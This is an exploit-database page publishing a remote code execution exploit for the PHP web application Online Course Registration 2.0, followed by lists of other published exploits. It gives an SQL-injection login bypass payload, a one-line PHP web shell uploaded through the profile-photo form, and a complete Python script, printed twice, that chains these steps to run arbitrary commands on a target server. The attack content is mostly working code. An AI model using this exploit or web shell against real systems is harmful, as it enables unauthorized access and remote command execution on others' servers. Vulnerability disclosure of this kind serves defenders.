Menu

Search for hundreds of thousands of exploits

"Online Course Registration 2.0 - Remote Code Execution"

Author

Exploit author

"Metin Yunus Kandemir"

Platform

Exploit platform

php

Release date

Exploit published date

2020-01-03

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
# Exploit Title: Online Course Registration 2.0 - Remote Code Execution
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-course-registration-free-download/
# Version: v2.0
# Category: Webapps
# Tested on: Xampp for Windows

# Description:
Attacker can bypass login page and access to student change password dashboard.

PoC Request (Authentication Bypass):

POST /onlinecourse/index.php HTTP/1.1
Host: target

regno=joke' or '1'='1'#&password=joke' or '1'='1'#&submit=


There isn't any file extension control in student panel "My Profile" section.
An unauthorized user can upload php file as profile image.

First PoC Request (RCE):

POST /onlinecourse/my-profile.php HTTP/1.1
Host: target

-----------------------------16046344889164047791563222514
Content-Disposition: form-data; name="photo"; filename="simple.php"
Content-Type: application/x-php

<?php $cmd=$_GET["cmd"]; echo `$cmd`; ?>


Second PoC Request (RCE):

GET /onlinecourse/studentphoto/simple.php?cmd=ipconfig HTTP/1.1
Host: target


Below basic python script will bypass authentication and execute command on target server.





import requests
import sys                        

if (len(sys.argv) !=3) or sys.argv[1] == "-h":
print "[*] Usage: PoC.py rhost/rpath "
print "[*] e.g.: PoC.py 127.0.0.1/onlinecourse "
exit(0)

rhost = sys.argv[1]
command = sys.argv[2]



url = "http://"+rhost+"/index.php"
data = {"regno": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}

with requests.Session() as session:
#bypass authentication
lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})

#check authentication bypass
check = session.get("http://"+rhost+"/my-profile.php", allow_redirects=False)
if check.status_code == 200:
print "[+] Authentication bypass was successfull"
else:
print "[-] Authentication bypass was unsuccessful"
sys.exit()

#upload simple php file

files = {'photo':('command.php', '<?php system($_GET["cmd"]); ?>')}
fdata = {"studentname": "Test", "studentregno": "10806157", "Pincode": "715989", "cgpa": "0.00", "photo": "command.php", "submit": ""}
furl = "http://"+rhost+"/my-profile.php"
session.post(url=furl, files= files, data=fdata)

#execution
final=session.get("http://"+rhost+"/studentphoto/command.php?cmd="+command)

#check execution
if final.status_code == 200:
print "[+] Command execution completed successfully."
print "\tPut on a happy face!\n"
else:
print "[-] Command execution was unsuccessful."
sys.exit()

print final.text

online-course-registration-rce.png

poc.py

import requests
import sys                         

if (len(sys.argv) !=3) or sys.argv[1] == "-h":
	print "[*] Usage: PoC.py rhost/rpath "
	print "[*] e.g.: PoC.py 127.0.0.1/onlinecourse "
	exit(0) 

rhost = sys.argv[1]
command = sys.argv[2]



url = "http://"+rhost+"/index.php"
data = {"regno": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""}

with requests.Session() as session:
	#bypass authentication
	lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"})
	
	#check authentication bypass
	check = session.get("http://"+rhost+"/my-profile.php", allow_redirects=False)
	if check.status_code == 200:
		print "[+] Authentication bypass was successfull"
	else:
		print "[-] Authentication bypass was unsuccessful"
		sys.exit()	 

	#upload simple php file

	files = {'photo':('command.php', '<?php system($_GET["cmd"]); ?>')}
	fdata = {"studentname": "Test", "studentregno": "10806157", "Pincode": "715989", "cgpa": "0.00", "photo": "command.php", "submit": ""}
	furl = "http://"+rhost+"/my-profile.php"
	session.post(url=furl, files= files, data=fdata)
	
	#execution
	final=session.get("http://"+rhost+"/studentphoto/command.php?cmd="+command)

	#check execution
	if final.status_code == 200:
		print "[+] Command execution completed successfully.\n"
		print "\tPut on a happy face!\n"
	else:
		print "[-] Command execution was unsuccessful."
		sys.exit()

	print final.text
Release DateTitleTypePlatformAuthor
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-23"ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)"dosios"Ivan Marmolejo"
2020-03-23"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection"webappsphp"Matthew Aberegg"
2020-03-23"Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)"doswindows"Cem Onat Karagun"
2020-03-23"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection"webappsphpqw3rTyTy
2020-03-23"CyberArk PSMP 10.9.1 - Policy Restriction Bypass"remotemultiple"LAHBAL Said"
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-03-20"VMware Fusion 11.5.2 - Privilege Escalation"localmacos"Rich Mirch"
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
2020-03-18"NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path"localwindows"El Masas"
2020-03-18"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure"remotemultiple"Maurizio S"
2020-03-18"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)"remotehardwareFarazPajohan
2020-03-18"Netlink GPON Router 1.0.11 - Remote Code Execution"webappshardwareshellord
2020-03-17"VMWare Fusion - Local Privilege Escalation"localmacosGrimm
2020-03-17"Rconfig 3.x - Chained Remote Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-17"ManageEngine Desktop Central - Java Deserialization (Metasploit)"remotemultipleMetasploit
2020-03-17"Microsoft VSCode Python Extension - Code Execution"localmultipleDoyensec
2020-03-16"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Directory Traversal"webappsphp"Antonio Cannito"
2020-03-16"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection"webappsphp"AYADI Mohamed"
2020-03-16"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)"webappsasp"Miguel Mendez Z"
2020-03-14"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)"doswindowseerykitty
2020-03-13"AnyBurn 4.8 - Buffer Overflow (SEH)"localwindows"Richard Davy"
2020-03-13"Drobo 5N2 4.1.1 - Remote Command Injection"remotehardware"Ian Sindermann"
2020-03-13"Centos WebPanel 7 - 'term' SQL Injection"webappslinux"Berke YILMAZ"
2020-03-12"rConfig 3.9 - 'searchColumn' SQL Injection"webappsphpvikingfr
2020-03-12"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection"webappsphp"Milad karimi"
2020-03-12"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure"webappsjava"RedTeam Pentesting GmbH"
2020-03-12"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)"webappsphp"Ismail Akıcı"
Release DateTitleTypePlatformAuthor
2020-03-23"rConfig 3.9.4 - 'search.crud.php' Remote Command Injection"webappsphp"Matthew Aberegg"
2020-03-23"Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection"webappsphpqw3rTyTy
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Directory Traversal"webappsphp"Antonio Cannito"
2020-03-16"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection"webappsphp"AYADI Mohamed"
2020-03-16"PHPKB Multi-Language 9 - Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-16"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution"webappsphp"Antonio Cannito"
2020-03-12"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)"webappsphp"Ismail Akıcı"
2020-03-12"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection"webappsphp"Milad karimi"
2020-03-12"rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-12"rConfig 3.9 - 'searchColumn' SQL Injection"webappsphpvikingfr
2020-03-12"Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection"webappsphp"Daniel Monzón"
2020-03-11"Wordpress Plugin Search Meter 2.13.2 - CSV injection"webappsphp"Daniel Monzón"
2020-03-11"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion"webappsphp"Andrea Cardaci"
2020-03-11"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading"webappsphp"Andrea Cardaci"
2020-03-10"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting"webappsphpEn_dust
2020-03-10"Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution"webappsphp"Andrea Cardaci"
2020-03-10"Persian VIP Download Script 1.0 - 'active' SQL Injection"webappsphpS3FFR
2020-03-10"PHPStudy - Backdoor Remote Code execution (Metasploit)"remotephpMetasploit
2020-03-09"PHP-FPM - Underflow Remote Code Execution (Metasploit)"remotephpMetasploit
2020-03-09"60CycleCMS - 'news.php' SQL Injection"webappsphpUnkn0wn
2020-03-09"Sentrifugo HRMS 3.2 - 'id' SQL Injection"webappsphpminhnb
2020-03-04"UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read"webappsphpNgoAnhDuc
2020-03-03"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection"webappsphpemaragkos
2020-03-03"Alfresco 5.2.4 - Persistent Cross-Site Scripting"webappsphp"Alexandre ZANNI"
2020-03-02"Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)"webappsphp"Jinson Varghese Behanan"
2020-03-02"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)"webappsphp"Lucas Amorim"
2020-02-27"Business Live Chat Software 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Meisam Monsef"
2020-02-26"PhpIX 2012 Professional - 'id' SQL Injection"webappsphpindoushka
2020-02-25"WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass"webappsphpGeekHack
Release DateTitleTypePlatformAuthor
2020-03-20"Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)"webappsphp"Metin Yunus Kandemir"
2020-01-07"Complaint Management System 4.0 - Remote Code Execution"webappsphp"Metin Yunus Kandemir"
2020-01-03"Online Course Registration 2.0 - Remote Code Execution"webappsphp"Metin Yunus Kandemir"
2020-01-01"Hospital Management System 4.0 - Authentication Bypass"webappsphp"Metin Yunus Kandemir"
2020-01-01"Shopping Portal ProVersion 3.0 - Authentication Bypass"webappsphp"Metin Yunus Kandemir"
2019-12-09"Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting"webappsphp"Metin Yunus Kandemir"
2019-09-13"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting"webappsphp"Metin Yunus Kandemir"
2019-09-09"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection"webappsphp"Metin Yunus Kandemir"
2019-09-09"Dolibarr ERP-CRM 10.0.1 - SQL Injection"webappsphp"Metin Yunus Kandemir"
2019-08-01"Ultimate Loan Manager 2.0 - Cross-Site Scripting"webappsmultiple"Metin Yunus Kandemir"
2019-07-12"MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting"webappsphp"Metin Yunus Kandemir"
2019-06-24"dotProject 2.1.9 - SQL Injection"webappsphp"Metin Yunus Kandemir"
2019-05-29"Free SMTP Server 2.5 - Denial of Service (PoC)"doswindows"Metin Yunus Kandemir"
2019-04-03"PhreeBooks ERP 5.2.3 - Remote Command Execution"remotepython"Metin Yunus Kandemir"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47843/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse